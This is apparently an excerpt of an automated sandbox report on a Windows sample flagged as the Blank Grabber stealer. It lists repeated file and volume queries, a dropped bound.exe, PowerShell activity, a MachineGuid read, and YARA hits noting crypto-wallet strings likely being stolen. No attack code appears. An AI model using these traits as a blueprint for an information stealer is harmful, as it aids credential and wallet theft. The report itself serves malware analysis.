                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76122 VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76122 VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76122 VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76122 VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76122 VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76122\_hashlib.pyd VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76122\base_library.zip VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76122\base_library.zip VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76122 VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76122\_queue.pyd VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76122 VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76122 VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76122 VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76122 VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76122 VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76122 VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76122 VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76122 VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76122\bound.blank VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76122\bound.blank VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeQueries volume information: C:\Users\user\AppData\Local\Temp\bound.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76122\base_library.zip VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76122\base_library.zip VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76122 VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76122\unicodedata.pyd VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\bound.exeQueries volume information: C:\Users\user\AppData\Local\Temp\bound.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\bound.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeCode function: 0_2_00007FF7EAD0D010 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00007FF7EAD0D010
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeCode function: 0_2_00007FF7EAD25C00 _get_daylight,_get_daylight,_get_daylight,_get_daylight,_get_daylight,GetTimeZoneInformation,0_2_00007FF7EAD25C00
                Source: C:\Users\user\AppData\Local\Temp\bound.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                Source: Amcache.hve.29.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                Source: Amcache.hve.29.drBinary or memory string: msmpeng.exe
                Source: Amcache.hve.29.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
                Source: Amcache.hve.29.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
                Source: Amcache.hve.29.drBinary or memory string: MsMpEng.exe

                Stealing of Sensitive Information

                barindex
                Yara detected Blank Grabber
                Source: Yara matchFile source: 00000002.00000003.1409163112.000001DCB59D9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000003.1407566160.000001DCB58FA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.1393387910.000001C12B872000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000003.1408378616.000001DCB591D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000003.1407872022.000001DCB58FA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1460493286.000001DCB5B30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.1393387910.000001C12B874000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000003.1408182982.000001DCB58FA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe PID: 7612, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe PID: 7664, type: MEMORYSTR
                Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\_MEI76122\rarreg.key, type: DROPPED
                Found many strings related to Crypto-Wallets (likely being stolen)
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1407566160.000001DCB58FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Electrum
